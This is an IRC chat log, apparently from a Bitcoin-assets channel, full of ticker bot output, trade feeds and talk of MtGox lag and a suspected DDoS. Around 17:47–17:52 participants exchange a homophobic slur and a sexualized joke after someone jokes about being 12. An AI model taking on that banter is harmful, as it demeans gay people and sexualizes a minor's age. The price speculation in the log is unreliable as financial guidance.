05 17:31:02 oh Apr 05 17:31:07 otherwise wtf Apr 05 17:31:21 fixed Apr 05 17:31:40 lol, i made that up in my brain. Apr 05 17:31:47 stupid brain Apr 05 17:32:14 [BTCTC] [SYNERGY] 1 @ 0.01998 BTC [+] Apr 05 17:33:04 [BTCTC] [SYNERGY] 1 @ 0.01999 BTC [+] Apr 05 17:33:32 kakobrekla Keefe keith_hanson knotwork KRS-1 KRS1 Apr 05 17:35:56 deadweasel: you're deadweasley or that's somebody else? Apr 05 17:36:33 that me, left my vpn on yesterday, had to use web irc at work cos no ssh Apr 05 17:37:05 weren't you hired to do something else? xD Apr 05 17:37:32 i'm considering in for my weekend project. Apr 05 17:37:36 in / it Apr 05 17:37:54 okay :D Apr 05 17:40:15 mircea_popescu: i want to build something like this for your options...there are so many strike prices right now http://imgur.com/zYFS8Pv Apr 05 17:40:44 like as a front end i mean Apr 05 17:41:12 so go ahead Apr 05 17:41:20 smickles was working on something similar Apr 05 17:41:36 you only support polling currently right? Apr 05 17:41:45 no data stream? Apr 05 17:42:03 there's a websocket for trades and tyou can also get the twitter whatever that is Apr 05 17:43:07 high: 139.90 low: 135.12 Apr 05 17:43:12 ahh this is so beautiful Apr 05 17:43:43 IKNORITE Apr 05 17:43:49 high five mircea_popescu Apr 05 17:43:52 i have some pretty rad ideas for an options/gui type interface Apr 05 17:43:54 o/ Apr 05 17:44:00 can't share Apr 05 17:44:02 (dont leave me hanging) Apr 05 17:44:03 hush hush Apr 05 17:44:12 ijs Apr 05 17:44:20 errybody got projects going Apr 05 17:44:33 .|. Apr 05 17:44:35 like that ? Apr 05 17:44:41 yah Apr 05 17:44:44 :D Apr 05 17:45:55 denialdenial: what do you think of this http://imgur.com/zYFS8Pv Apr 05 17:46:13 denialdenial: are you related to danieldaniel Apr 05 17:46:20 ;;identify denialdenial Apr 05 17:46:20 Error: That operation cannot be done in a channel. Apr 05 17:46:25 ;;ident denialdenial Apr 05 17:46:26 Nick 'denialdenial', with hostmask 'denialdenial!~jcpham@unaffiliated/jcpham', is identified as user jcpham, with GPG key id C71FB5ED6ACE04AF, key fingerprint F7299BD73879E866613EAB24C71FB5ED6ACE04AF, and bitcoin address 16zaKwZC6n9BMipwLbewYGn8NXEgmN2f3Y Apr 05 17:46:28 derp Apr 05 17:46:38 ;;ident danieldaniel Apr 05 17:46:38 Error: I am not seeing this user on IRC. If you want information about a registered gpg user, try the 'gpg info' command instead. Apr 05 17:46:48 ;;getrating danieldaniel Apr 05 17:46:48 WARNING: Currently not authenticated. User danieldaniel, rated since Wed Jul 13 18:27:02 2011. Cumulative rating 148, from 111 total ratings. Received ratings: 108 positive, 3 negative. Sent ratings: 98 positive, 9 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=danieldaniel Apr 05 17:47:04 why you checking dansqaures ratings Apr 05 17:47:20 i'm not him Apr 05 17:47:21 he's 12 Apr 05 17:47:34 are you 12? Apr 05 17:47:40 almost Apr 05 17:47:48 very soon. Apr 05 17:48:04 ;;getrating denialdenial Apr 05 17:48:04 This user has not yet been rated. WARNING: Currently not authenticated. Apr 05 17:48:06 are you gay? Apr 05 17:48:11 almost Apr 05 17:48:12 very soon. Apr 05 17:48:20 can i help you? Apr 05 17:48:34 ;;getrating [ident denialdenial] Apr 05 17:48:34 Currently authenticated from hostmask denialdenial!~jcpham@unaffiliated/jcpham . CAUTION: irc nick differs from otc registered nick. User jcpham, rated since Fri Nov 11 10:35:04 2011. Cumulative rating 102, from 73 total ratings. Received ratings: 70 positive, 3 negative. Sent ratings: 74 positive, 5 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=jcpham Apr 05 17:48:52 [MPEX] [S.MPOE] 13300 @ 0.00070681 = 9.4006 BTC [-] Apr 05 17:49:25 !ticker m s.dice Apr 05 17:49:25 [MPEX:S.DICE] 1D: 0.00313722 / 0.0033218 / 0.00333333 (8140 shares, 27.04 BTC), 7D: 0.0031 / 0.00326054 / 0.00439992 (540907 shares, 1,763.65 BTC), 30D: 0.0031 / 0.00373031 / 0.006 (1695348 shares, 6,324.18 BTC) Apr 05 17:49:45 that will skyrocket as soon as divs are paid Apr 05 17:49:47 jeeze Apr 05 17:49:48 check that next to the last rating Apr 05 17:49:54 hilarity Apr 05 17:50:26 mircea_popescu: what exactly did erik say? Apr 05 17:50:43 that he's moved and getting things together. Apr 05 17:51:01 oh is he moving satoshi dice physically? Apr 05 17:51:04 is there a public record of that ? Apr 05 17:51:06 he flew to ireland? Apr 05 17:51:10 sdice is in ireland Apr 05 17:51:17 he moved himself physically :) Apr 05 17:51:48 oh to a bigger penthouse in new york Apr 05 17:51:56 no, out of US Apr 05 17:51:57 nah out of the us Apr 05 17:51:58 USSA Apr 05 17:52:19 does he still work for bitinstant? Apr 05 17:52:24 lol jurov you help prepubescent prefags grow into the fold ? Apr 05 17:52:26 not really Apr 05 17:52:44 they had to split coinapult off of that, i believe, but I don't know all the details Apr 05 17:52:53 oh wow Apr 05 17:52:55 yea. but only bottoms. Apr 05 17:55:08 [MPEX] [S.DICE] 1000 @ 0.00333333 = 3.3333 BTC [+] Apr 05 17:55:30 thestringpuller: thats the funny thing is that the share price goes up AFTER the dividends Apr 05 17:57:04 best time to buy Apr 05 17:57:29 slightly above original ipo tier 2 price Apr 05 17:58:13 ;;seen Bugpowder Apr 05 17:58:13 Bugpowder was last seen in #bitcoin-assets 3 hours, 26 minutes, and 40 seconds ago: Bids now > $11.1MM Apr 05 17:58:37 [MPEX] [S.MPOE] 6200 @ 0.00069564 = 4.313 BTC [-] Apr 05 17:58:55 [MPEX] [S.DICE] 360 @ 0.00333333 = 1.2 BTC [+] Apr 05 18:11:12 ;;ticker Apr 05 18:11:13 BTCUSD ticker | Best bid: 136.84000, Best ask: 136.99999, Bid-ask spread: 0.15999, Last trade: 136.99999, 24 hour volume: 60351.15215987, 24 hour low: 128.00100, 24 hour high: 139.89998, 24 hour vwap: 134.65262 Apr 05 18:11:19 ;;bids 0 Apr 05 18:11:21 There are currently 31166637 bitcoins demanded at or over 0.0 USD, worth 11949599.5809 USD in total. | Data vintage: 0.0106 seconds Apr 05 18:12:28 ;;bids 0 Apr 05 18:12:29 There are currently 31166637 bitcoins demanded at or over 0.0 USD, worth 11949599.5809 USD in total. | Data vintage: 67.6056 seconds Apr 05 18:12:39 almost 12 million Apr 05 18:12:46 weekend rocket? :) Apr 05 18:14:06 ;;ticker Apr 05 18:14:07 BTCUSD ticker | Best bid: 137.29312, Best ask: 137.71069, Bid-ask spread: 0.41757, Last trade: 137.98994, 24 hour volume: 60258.80277878, 24 hour low: 128.00100, 24 hour high: 139.89998, 24 hour vwap: 134.65657 Apr 05 18:18:39 [MPEX] [S.MPOE] 9604 @ 0.0007033 = 6.7545 BTC [+] Apr 05 18:18:40 [MPEX] [S.MPOE] 4031 @ 0.00070686 = 2.8494 BTC [+] Apr 05 18:18:50 [MPEX] [S.MPOE] 9965 @ 0.00070706 = 7.0459 BTC [+] Apr 05 18:28:24 ;;ticker Apr 05 18:28:25 BTCUSD ticker | Best bid: 138.00002, Best ask: 138.15557, Bid-ask spread: 0.15555, Last trade: 138.00002, 24 hour volume: 60159.81680270, 24 hour low: 128.00100, 24 hour high: 139.89998, 24 hour vwap: 134.66702 Apr 05 18:28:31 !ticker m s.dice Apr 05 18:28:32 [MPEX:S.DICE] 1D: 0.00313722 / 0.00332345 / 0.00333333 (9500 shares, 31.57 BTC), 7D: 0.0031 / 0.00326072 / 0.00439992 (542267 shares, 1,768.18 BTC), 30D: 0.0031 / 0.00372916 / 0.006 (1693319 shares, 6,314.67 BTC) Apr 05 18:34:04 ;;bc,24hprc Apr 05 18:34:05 134.34 Apr 05 18:36:59 [HAVELOCK] [SDICE] 1 @ 0.360123 BTC [-] Apr 05 18:38:58 [HAVELOCK] [HIM] 1 @ 1.93 BTC [+] Apr 05 18:40:28 [BTCTC] [ASICMINER-PT] 1 @ 0.743 BTC [-] Apr 05 18:40:34 [BTCTC] [ASICMINER-PT] 7 @ 0.742 = 5.194 BTC [-] Apr 05 18:40:36 [BTCTC] [ASICMINER-PT] 1 @ 0.741 BTC [-] Apr 05 18:40:42 [BTCTC] [ASICMINER-PT] 1 @ 0.74 BTC [-] Apr 05 18:42:31 [BTCTC] [ASICMINER-PT] 1 @ 0.769 BTC [+] Apr 05 18:42:35 [BTCTC] [ASICMINER-PT] 1 @ 0.77 BTC [+] Apr 05 18:44:15 ;;ticker Apr 05 18:44:16 BTCUSD ticker | Best bid: 138.00000, Best ask: 138.25000, Bid-ask spread: 0.25000, Last trade: 138.00000, 24 hour volume: 60135.66333421, 24 hour low: 128.00100, 24 hour high: 139.89998, 24 hour vwap: 134.68006 Apr 05 18:44:42 ;;bids 0 Apr 05 18:44:42 There are currently 31166837 bitcoins demanded at or over 0.0 USD, worth 12022834.3331 USD in total. | Data vintage: 4.7549 seconds Apr 05 18:45:14 Pleasantly surprised we're staying so high in price Apr 05 18:48:55 [BTCTC] [BTC-TRADING-PT] 1 @ 0.1722 BTC [-] Apr 05 18:57:58 [HAVELOCK] [SDICE] 2 @ 0.3581 = 0.7162 BTC [-] Apr 05 18:59:49 [BTCTC] [PAJKA.BOND] 2 @ 0.1025 = 0.205 BTC [+] Apr 05 18:59:52 [BTCTC] [PAJKA.BOND] 18 @ 0.1026 = 1.8468 BTC [+] Apr 05 19:06:14 how does get invited to #bitcoin-security? Apr 05 19:06:30 *one Apr 05 19:06:59 [HAVELOCK] [SDICE] 14 @ 0.36 = 5.04 BTC [+] Apr 05 19:08:01 if you have to ask, you cant be invited Apr 05 19:08:51 i figured Apr 05 19:08:56 hehe Apr 05 19:08:59 honestly i have no clue Apr 05 19:09:03 it just seemed to make sense Apr 05 19:09:07 like.. maybe you have to hack your way in? Apr 05 19:09:16 probably Apr 05 19:09:28 ;;ticker Apr 05 19:09:29 BTCUSD ticker | Best bid: 137.99985, Best ask: 138.00000, Bid-ask spread: 0.00015, Last trade: 138.00000, 24 hour volume: 59900.23588376, 24 hour low: 128.00100, 24 hour high: 139.89998, 24 hour vwap: 134.71313 Apr 05 19:09:29 there is no bitcoin security. Apr 05 19:09:51 ;;seen namworld Apr 05 19:09:51 namworld was last seen in #bitcoin-assets 1 day, 16 hours, 15 minutes, and 16 seconds ago: lag on the rise... and almost no trading... Apr 05 19:10:32 hi Apr 05 19:10:55 [MPEX] [S.DICE] 600 @ 0.00333333 = 2 BTC [+] Apr 05 19:10:58 [HAVELOCK] [SDICE] 1 @ 0.3581 BTC [-] Apr 05 19:11:52 * Channel #bitcoin-security? modes: +ns Apr 05 19:11:52 * jcpham sets mode +t #bitcoin-security? Apr 05 19:11:58 [HAVELOCK] [KCIM] 1 @ 1.17 BTC [+] Apr 05 19:11:59 [HAVELOCK] [KCIM] 3 @ 1.185 = 3.555 BTC [+] Apr 05 19:12:21 !ticker h him Apr 05 19:12:23 [HAVELOCK:HIM] 1D: 1.91900000 / 1.9212 / 1.93000000 (5 shares, 9.60600000 BTC), 7D: 1.87000000 / 1.98256408 / 2.08000000 (103 shares, 204.20409996 BTC), 30D: 1.41000000 / 1.81345201 / 2.08000000 (719 shares, 1303.87199240 BTC) Apr 05 19:12:58 [HAVELOCK] [SDICE] 5 @ 0.3581 = 1.7905 BTC [-] Apr 05 19:15:57 [HAVELOCK] [KCIM] 1 @ 1.185 BTC [+] Apr 05 19:16:47 topace|2: it's for discussing exploits not in the wild.. yet Apr 05 19:17:04 https://en.bitcoin.it/wiki/Common_Vulnerabilities_and_Exposures Apr 05 19:17:58 [HAVELOCK] [SDICE] 1 @ 0.3501 BTC [-] Apr 05 19:18:49 !ticker m ^OIx Apr 05 19:18:50 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 93.3570601 / 108.2470225 / 135.80742037 (19613 shares, 8,037.73 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Apr 05 19:22:25 I'm surprised there isnt a BitBet "MtGox will make Litecoin available for trading with BTC and USD" Apr 05 19:22:29 so i submitted one Apr 05 19:22:38 ;;bids 0 Apr 05 19:22:38 There are currently 31167170 bitcoins demanded at or over 0.0 USD, worth 12081001.5474 USD in total. | Data vintage: 17.1370 seconds Apr 05 19:22:43 ! Apr 05 19:22:48 up up and away! Apr 05 19:23:15 http://www.sierrachart.com/image.php?l=1365178675195.png Apr 05 19:27:29 139 Apr 05 19:28:46 [MPEX] [S.DICE] 2424 @ 0.0033 = 7.9992 BTC [-] Apr 05 19:28:48 [MPEX] [S.DICE] 3391 @ 0.00324997 = 11.0206 BTC [-] Apr 05 19:30:20 $avg Apr 05 19:30:21 ThickAsThieves: 134.44 Apr 05 19:44:51 ;;goxlog Apr 05 19:44:51 Error: "goxlog" is not a valid command. Apr 05 19:44:59 ;;goxlag Apr 05 19:45:00 MtGox lag is 1.069233 seconds. During this time, light travels 0.00214273096027 AU. You could have sent a bitcoin across the outer diameter of Saturn's rings (0.0024 AU). Apr 05 19:47:52 ;;goxlag Apr 05 19:47:53 MtGox lag is 103.696989 seconds. During this time, light travels 0.207807604907 AU. You could have sent a bitcoin between Earth and Venus at their closest approach (0.254 AU). Apr 05 19:52:35 ;;goxlag Apr 05 19:52:36 MtGox lag is 6.830921 seconds. During this time, light travels 0.0136890892012 AU. You could have sent a bitcoin from Jupiter to its second largest moon, Callisto (0.012567 AU). Apr 05 19:53:04 ;;goxlag Apr 05 19:53:06 MtGox lag is 31.669719 seconds. During this time, light travels 0.0634657622842 AU. You could have sent a bitcoin approximately the distance covered by Voyager 1 in one week (0.0689 AU). Apr 05 19:53:08 ;;ticker Apr 05 19:53:09 BTCUSD ticker | Best bid: 139.50002, Best ask: 139.88000, Bid-ask spread: 0.37998, Last trade: 139.50002, 24 hour volume: 62471.48988893, 24 hour low: 128.00100, 24 hour high: 140.00000, 24 hour vwap: 135.01616 Apr 05 19:53:26 dlaiming ddos in #mtgox Apr 05 19:53:33 suuuure. Apr 05 19:53:56 well volume isn't that high.. it's not like there trade engine should be melting down Apr 05 19:54:07 I executed a buy Apr 05 19:54:14 it went through right away Apr 05 19:54:20 i was wondering about that Apr 05 19:54:29 "volume" means number of coins Apr 05 19:54:39 is there any reporting of number of transactions? Apr 05 19:54:45 I beli that there is a DDOS going on. Apr 05 19:54:49 you can do 10,000 transactions for one coin Apr 05 19:54:52 at least Apr 05 19:55:11 ;;goxlag Apr 05 19:55:11 MtGox lag is 12.045338 seconds. During this time, light travels 0.0241387224857 AU. You could have sent a bitcoin ten times between Earth and Moon (0.0257 AU). Apr 05 19:55:15 ;;ticker Apr 05 19:55:16 BTCUSD ticker | Best bid: 139.92000, Best ask: 139.98000, Bid-ask spread: 0.06000, Last trade: 139.92000, 24 hour volume: 63174.54465026, 24 hour low: 128.00100, 24 hour high: 140.00000, 24 hour vwap: 135.07365 Apr 05 19:55:24 well my transacaction went trough immediately Apr 05 19:55:37 so a 10-minute ddos? Apr 05 19:55:43 only when price peaks? Apr 05 19:55:58 seems that it continues until price breaks Apr 05 19:56:17 well, i can send one order for 10,oo0 coins...that isn't a lot of "Volume" Apr 05 19:56:27 people kinda know what's going on now, so I'm not sure we'll see the same tanking Apr 05 19:56:32 in other words, their lag is not related to number of coins, but rather to number of orders Apr 05 19:56:50 so is their a measurement of number of orders? Apr 05 19:57:01 doubtful Apr 05 19:57:05 No I think the lag is realted to a ddos that's happening Apr 05 19:57:11 either way Apr 05 19:57:13 especially since you can make soft orders Apr 05 19:57:17 that dont even show Apr 05 19:57:21 soft orders? Apr 05 19:57:29 they are unfunded and don't hit the books till funds arrive Apr 05 19:57:35 you can have as many bids as you want Apr 05 19:57:40 past your USD Apr 05 19:57:44 oh yeah.. Apr 05 19:57:51 they only list the ones that are funded Apr 05 19:57:58 [HAVELOCK] [SDICE] 1 @ 0.34758 BTC [-] Apr 05 19:57:58 but others trigger dynamically Apr 05 19:58:29 some think that is the cause of lag Apr 05 19:58:40 i make 10000 orders at minimum price Apr 05 19:58:51 every tme one fills, all orders need to be adjusted Apr 05 19:58:58 [HAVELOCK] [SDICE] 1 @ 0.345 BTC [-] Apr 05 20:01:41 ThickAsThieves: so you are the cause of goxlag? Apr 05 20:01:45 ;;ticker Apr 05 20:01:49 BTCUSD ticker | Best bid: 140.25622, Best ask: 140.30000, Bid-ask spread: 0.04378, Last trade: 140.30000, 24 hour volume: 63655.09673072, 24 hour low: 128.00100, 24 hour high: 140.25622, 24 hour vwap: 135.11602 Apr 05 20:01:57 interesting we are above 140 Apr 05 20:02:44 if you hard refres clarkmoody you get updated numbers, but no live updates Apr 05 20:03:18 I am not Apr 05 20:03:25 i dont have time for that shit Apr 05 20:03:38 164 strike price options FTW Apr 05 20:03:40 if i was buying tons of btc i might do that though Apr 05 20:05:00 also, why use clarkmoody now that bitcoinity.org is available? Apr 05 20:05:00 ;;goxlag Apr 05 20:05:01 MtGox lag is 0.845698 seconds. During this time, light travels 0.00169476932309 AU. You could have sent a bitcoin across the outer diameter of Saturn's rings (0.0024 AU). Apr 05 20:05:18 clarkmoody shows better livebooks... usually Apr 05 20:05:31 clarkmody is working again Apr 05 20:05:33 unless i'm missing somehting about bitcoinity Apr 05 20:05:43 ah yes Apr 05 20:05:48 They are complementary Apr 05 20:05:53 it does have live book...bitcoinity only has ticker Apr 05 20:05:55 sockets are working Apr 05 20:06:04 ;;bids 0 Apr 05 20:06:07 There are currently 31152031 bitcoins demanded at or over 0.0 USD, worth 11785518.8965 USD in total. | Data vintage: 0.0105 seconds Apr 05 20:06:25 ;;asks 1000000 Apr 05 20:06:25 There are currently 56435.086 bitcoins offered at or under 1000000.0 USD, worth 120082663.339 USD in total. | Data vintage: 18.3401 seconds Apr 05 20:06:47 number of coins for sale hasnt changed much this week Apr 05 20:06:55 [BTCTC] [PAJKA.BOND] 20 @ 0.09 = 1.8 BTC [-] Apr 05 20:07:14 It's gone down a bit was low 60s earlier Apr 05 20:07:19 I think we are going to challenge 150 today. Apr 05 20:07:26 really? Apr 05 20:07:33 [BTCTC] [BASIC-MINING] 10 @ 0.39 = 3.9 BTC [+] Apr 05 20:07:41 [BTCTC] [PAJKA.BOND] 1 @ 0.1005 BTC [+] Apr 05 20:07:52 a couple small walls to get through though.. Apr 05 20:08:09 ;;asks 149.94 Apr 05 20:08:12 There are currently 14148.485 bitcoins offered at or under 149.94 USD, worth 2058006.08163 USD in total. | Data vintage: 0.0019 seconds Apr 05 20:08:17 but the buy depth looks like a tidal wave. Apr 05 20:08:46 "small" being "actually not that small" Apr 05 20:09:26 yeah. The bid depth is up over 2 million from yesterday Apr 05 20:09:35 that's probably new money looking to buy Apr 05 20:09:50 could take us right up to the wall Apr 05 20:11:59 looks like it's going up.. Apr 05 20:12:27 buy flors keep getting thrown up Apr 05 20:12:32 yah. Apr 05 20:12:46 Maybe no dip this weekend too. We already had the correction Apr 05 20:12:51 no real ceiling for a couple bucks Apr 05 20:13:09 oh my, another shift of a wall forward Apr 05 20:13:13 ;;bids 0 Apr 05 20:13:16 There are currently 31152051 bitcoins demanded at or over 0.0 USD, worth 11589246.0017 USD in total. | Data vintage: 0.0255 seconds Apr 05 20:15:34 vircurex completely wiped from face of earth Apr 05 20:15:56 jurov? Apr 05 20:15:58 vitcure? reently? Apr 05 20:16:14 recently? Apr 05 20:16:16 kakobrekla? Apr 05 20:16:18 Or ddos Apr 05 20:16:36 whats with the curex Apr 05 20:18:30 i don't know. ping says Time to live exceeded Apr 05 20:20:23 ;;goxlag Apr 05 20:20:24 MtGox lag is 1.152629 seconds. During this time, light travels 0.00230985561052 AU. You could have sent a bitcoin across the outer diameter of Saturn's rings (0.0024 AU). Apr 05 20:20:30 ;;tiker Apr 05 20:20:30 Error: "tiker" is not a valid command. Apr 05 20:20:33 https://docs.google.com/spreadsheet/ccc?key=0Aiec3-Eo_yO5dHB2dVdiaEltUHAtTWlBcFhXQVBYeGc#gid=12 Apr 05 20:20:35 ;;ticker Apr 05 20:20:36 BTCUSD ticker | Best bid: 140.00001, Best ask: 140.10000, Bid-ask spread: 0.09999, Last trade: 140.00001, 24 hour volume: 60788.31684229, 24 hour low: 128.00100, 24 hour high: 140.75000, 24 hour vwap: 135.69764 Apr 05 20:21:47 there is a routing loop in the path to vircurex.com Apr 05 20:21:57 could be DDOS related Apr 05 20:22:55 https://twitter.com/Vircurex/status/320224745402544128 Apr 05 20:27:28 [MPEX] [S.MPOE] 4869 @ 0.00069564 = 3.3871 BTC [-] Apr 05 20:29:36 please erik, why, why publish a half report ? Apr 05 20:32:17 there's a report? Apr 05 20:32:28 tabs on bottom of spreadsheet ? Apr 05 20:32:29 19:20 Apr 05 20:33:51 but it's like a clear copy of feb, he start to fill it Apr 05 20:35:37 maybe you are watching him work Apr 05 20:35:43 its not like he announced an update Apr 05 20:36:39 yes, done Apr 05 20:36:58 net profit 890... Apr 05 20:38:12 0.00000890 Apr 05 20:38:19 Sdice? Apr 05 20:38:43 yep Apr 05 20:40:59 150 is going down. I know it Apr 05 20:42:54 monday ? Apr 05 20:43:01 [HAVELOCK] [SDICE] 3 @ 0.3410002 = 1.023 BTC [-] Apr 05 20:43:02 [HAVELOCK] [SDICE] 6 @ 0.34100001 = 2.046 BTC [-] Apr 05 20:43:04 [HAVELOCK] [SDICE] 1 @ 0.341 BTC [-] Apr 05 20:43:05 [HAVELOCK] [SDICE] 12 @ 0.3401 = 4.0812 BTC [-] Apr 05 20:43:05 [HAVELOCK] [SDICE] 6 @ 0.3400001 = 2.04 BTC [-] Apr 05 20:43:06 [HAVELOCK] [SDICE] 1 @ 0.3400001 BTC [-] Apr 05 20:43:07 [HAVELOCK] [SDICE] 1 @ 0.34 BTC [-] Apr 05 20:43:08 [HAVELOCK] [SDICE] 11 @ 0.34 = 3.74 BTC [-] Apr 05 20:43:58 [HAVELOCK] [SDICE] 20 @ 0.34 = 6.8 BTC [-] Apr 05 20:44:14 sell that sdice people! Apr 05 20:44:21 Today Apr 05 20:44:55 i'll pick some more up. Apr 05 20:44:58 [HAVELOCK] [VTX] 100 @ 0.4448 = 44.48 BTC [-] Apr 05 20:47:24 cmon it's friday, time to drink Apr 05 20:47:49 not to score btc Apr 05 20:48:32 [BTCTC] [ASICMINER-PT] 7 @ 0.76897 = 5.3828 BTC [-] Apr 05 20:48:57 [HAVELOCK] [HIM] 1 @ 1.93 BTC [+] Apr 05 20:49:00 [MPEX] [S.DICE] 2000 @ 0.00329642 = 6.5928 BTC [+] Apr 05 20:49:13 142 Apr 05 20:49:19 [BTCTC] [ASICMINER-PT] 1 @ 0.76898 BTC [+] Apr 05 20:49:28 NEXT! Apr 05 20:49:33 [BTCTC] [ASICMINER-PT] 7 @ 0.76899 = 5.3829 BTC [+] Apr 05 20:49:52 143 Apr 05 20:49:58 [HAVELOCK] [KCIM] 2 @ 1.185 = 2.37 BTC [+] Apr 05 20:50:05 I love clarkmoddy for the dings Apr 05 20:50:06 get ready for lag fest! Apr 05 20:50:10 ;;ticker Apr 05 20:50:11 BTCUSD ticker | Best bid: 141.80000, Best ask: 141.85000, Bid-ask spread: 0.05000, Last trade: 141.80000, 24 hour volume: 60924.16404900, 24 hour low: 129.00100, 24 hour high: 141.89000, 24 hour vwap: 136.18292 Apr 05 20:50:17 [BTCTC] [ASICMINER-PT] 4 @ 0.769 = 3.076 BTC [+] Apr 05 20:50:19 ;;goxlax Apr 05 20:50:19 144 Apr 05 20:50:20 Error: "goxlax" is not a valid command. Apr 05 20:50:21 [BTCTC] [ASICMINER-PT] 6 @ 0.77 = 4.62 BTC [+] Apr 05 20:50:27 ;;goxlag Apr 05 20:50:28 MtGox lag is 112.267925 seconds. During this time, light travels 0.224983664686 AU. You could have sent a bitcoin between Earth and Venus at their closest approach (0.254 AU). Apr 05 20:50:57 [HAVELOCK] [VTX] 2 @ 0.4448 = 0.8896 BTC [-] Apr 05 20:50:59 ;;calc 3448*143 Apr 05 20:50:59 493064 Apr 05 20:51:11 $500,000 buy order Apr 05 20:51:15 500k$ BAM Apr 05 20:51:45 ha Apr 05 20:51:58 and the buy wall at 141.6 is still there Apr 05 20:52:02 ;;bids 0 Apr 05 20:52:05 There are currently 31143382 bitcoins demanded at or over 0.0 USD, worth 11579625.3003 USD in total. | Data vintage: 0.0114 seconds Apr 05 20:53:38 oh where oh where will we land after lad? nobody knows Apr 05 20:53:43 lag* Apr 05 20:53:47 ;;goxlag Apr 05 20:53:47 MtGox lag is 196.769549 seconds. During this time, light travels 0.394323973054 AU. You could have sent a bitcoin from the Sun to Mercury (0.39 AU). Apr 05 20:53:53 dear lord Apr 05 20:55:25 i think gox does need ;;goxlax Apr 05 20:55:32 hehe Apr 05 20:55:58 i'm beginning to believe this soft order thing really is the problemn Apr 05 20:56:10 it only lags when there are lots of orders in one direction Apr 05 20:56:23 thats not ddos Apr 05 20:56:40 it lags when a big order goes off and cleans out a big set of standing orders Apr 05 20:59:26 sup Apr 05 21:00:46 Ola, Erik. Apr 05 21:01:19 hola senior Apr 05 21:01:44 what wonderful sdice updates do you bring us today? Apr 05 21:01:53 poker ? Apr 05 21:02:00 in the rear Apr 05 21:02:23 evoorhees: how's that bitinstant debit card going? Apr 05 21:03:27 oy vey Apr 05 21:03:39 oh my god wow Apr 05 21:04:24 ;;goxlag Apr 05 21:04:24 MtGox lag is 46.315103 seconds. During this time, light travels 0.0928149478423 AU. You could have sent a bitcoin ten times between Saturn and Titan (0.0802 AU). Apr 05 21:04:26 ;;tixker Apr 05 21:04:27 Error: "tixker" is not a valid command. Apr 05 21:04:27 ;;bids 0 Apr 05 21:04:30 http://youtu.be/51GZ5hg_ZHk Apr 05 21:04:30 There are currently 31144502 bitcoins demanded at or over 0.0 USD, worth 11685628.9433 USD in total. | Data vintage: 0.0148 seconds Apr 05 21:04:31 ;;ticker Apr 05 21:04:32 BTCUSD ticker | Best bid: 142.10100, Best ask: 143.98000, Bid-ask spread: 1.87900, Last trade: 142.10100, 24 hour volume: 60924.16404900, 24 hour low: 129.00100, 24 hour high: 141.89000, 24 hour vwap: 136.18292 Apr 05 21:04:40 oy vey, holy cow, oh my god, wow Apr 05 21:04:52 they say i'm gettin fresher every time i turn around Apr 05 21:05:35 day in, and day out, we trying to get this paper Apr 05 21:08:26 [MPEX] [S.DICE] [PAID] 445.0881225 BTC to 50`000`000 shares, 890 satoshi per share Apr 05 21:08:55 don't spend it all in one place! Apr 05 21:09:05 s.dice div paid Apr 05 21:09:10 oh bot beat me to it :) Apr 05 21:09:27 nice Apr 05 21:09:57 my apologies for the low performing month, the 1920 btc jackpot really put a damper on things Apr 05 21:11:00 well, jackpots are part of the game! and keeps interest high. Apr 05 21:11:15 it's gambling. i'll take the opportunity to buy more sdice. ;) Apr 05 21:12:04 will ther ebe any adjustments to min/max bids going forward? Apr 05 21:12:13 to deal with BTC rising value Apr 05 21:13:07 <[\\\]> ;;ident evoorhees Apr 05 21:13:07 Nick 'evoorhees', with hostmask 'evoorhees!~evoorhees@200.108.54.73', is not identified. Apr 05 21:13:47 ThickAsThieves - yes probably Apr 05 21:13:58 has this been a matter of contention? Apr 05 21:14:07 only in my own head Apr 05 21:14:11 hehe Apr 05 21:14:21 just seems logical Apr 05 21:14:34 <[\\\]> increasing the max bid? Apr 05 21:14:40 any new features coming soon? Apr 05 21:14:56 withdrawals will be depricated Apr 05 21:15:14 feel free to tell me to 'wait for the damn update on forums plz" Apr 05 21:15:25 <[\\\]> ThickAsThieves: wait for the damn update on forums plz Apr 05 21:15:31 not you Apr 05 21:15:34 :P Apr 05 21:15:40 <[\\\]> you didn't specify Apr 05 21:15:52 okay you can tell me too Apr 05 21:15:56 <[\\\]> yay Apr 05 21:16:06 <[\\\]> but since I've already told you, I'm done. Apr 05 21:16:40 I'll provide a good update in about 2 weeks I think Apr 05 21:16:48 <[\\\]> 2 weeks?!? Apr 05 21:16:55 but but Apr 05 21:16:57 yep Apr 05 21:16:59 <[\\\]> is that a bfl 2 weeks? Apr 05 21:17:03 hehe Apr 05 21:17:10 lol Apr 05 21:17:15 nice Panamanian IP Apr 05 21:17:23 thanks Apr 05 21:17:31 I'm officially a non US resident Apr 05 21:17:33 thank god Apr 05 21:17:42 jealous Apr 05 21:17:49 <[\\\]> aww Apr 05 21:17:54 <[\\\]> how are you gonna be jailed now? Apr 05 21:17:58 [HAVELOCK] [SDICE] 63 @ 0.3391 = 21.3633 BTC [-] Apr 05 21:18:05 <[\\\]> you take all the fun out of it Apr 05 21:18:14 well done, just in time ! Apr 05 21:18:23 just in time for what? Apr 05 21:18:39 the eternally impending us crackdown ;) Apr 05 21:18:42 a hot summer Apr 05 21:18:57 [HAVELOCK] [SDICE] 10 @ 0.32 = 3.2 BTC [-] Apr 05 21:18:59 [HAVELOCK] [SDICE] 10 @ 0.32 = 3.2 BTC [-] Apr 05 21:19:00 [HAVELOCK] [SDICE] 8 @ 0.3191 = 2.5528 BTC [-] Apr 05 21:19:01 [HAVELOCK] [SDICE] 3 @ 0.31900001 = 0.957 BTC [-] Apr 05 21:19:02 [HAVELOCK] [SDICE] 2 @ 0.3161 = 0.6322 BTC [-] Apr 05 21:19:03 [HAVELOCK] [SDICE] 10 @ 0.31600001 = 3.16 BTC [-] Apr 05 21:19:04 [HAVELOCK] [SDICE] 35 @ 0.3155 = 11.0425 BTC [-] Apr 05 21:19:05 [HAVELOCK] [SDICE] 122 @ 0.315 = 38.43 BTC [-] Apr 05 21:19:18 havelock no like sdice divs Apr 05 21:19:32 I imagine any "US crackdown" will be in 3-5 years and will be broad and epic Apr 05 21:19:41 but for now, bitcoin just got legal status Apr 05 21:19:49 I don't think the gov has any intention of a crackdown just yet Apr 05 21:19:57 [HAVELOCK] [SDICE] 2 @ 0.315 = 0.63 BTC [-] Apr 05 21:20:35 no but 